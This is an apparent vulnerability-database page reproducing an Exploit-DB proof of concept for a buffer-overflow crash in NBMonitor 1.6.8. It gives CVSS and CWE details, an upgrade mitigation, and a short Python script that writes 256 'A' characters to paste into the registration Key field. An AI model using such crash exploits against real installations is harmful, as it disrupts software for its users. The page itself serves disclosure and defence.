header-logo
Suggest Exploit
vendor:
NBMonitor
by:
Erick Galindo
7.8
CVSS
HIGH
Denial of Service
119
CWE
Product Name: NBMonitor
Affected Version From: 1.6.8
Affected Version To: 1.6.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:nsauditor:nbmonitor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2021

NBMonitor 1.6.8 – Denial of Service (PoC)

A denial of service vulnerability exists in NBMonitor 1.6.8 due to a buffer overflow when a crafted string of 256 A's is copied to the clipboard and pasted into the 'Key' field when registering the software. This causes the application to crash.

Mitigation:

Upgrade to the latest version of NBMonitor.
Source

Exploit-DB raw data:

# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo 
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.8
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Go to Register > Enter Registration Code...
#3.- Write anything in 'Name' field
#4.- Paste clipboard in 'Key' field
#5.- Click on button -> Ok

buffer = "\x41" * 256

f = open ("NBM.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR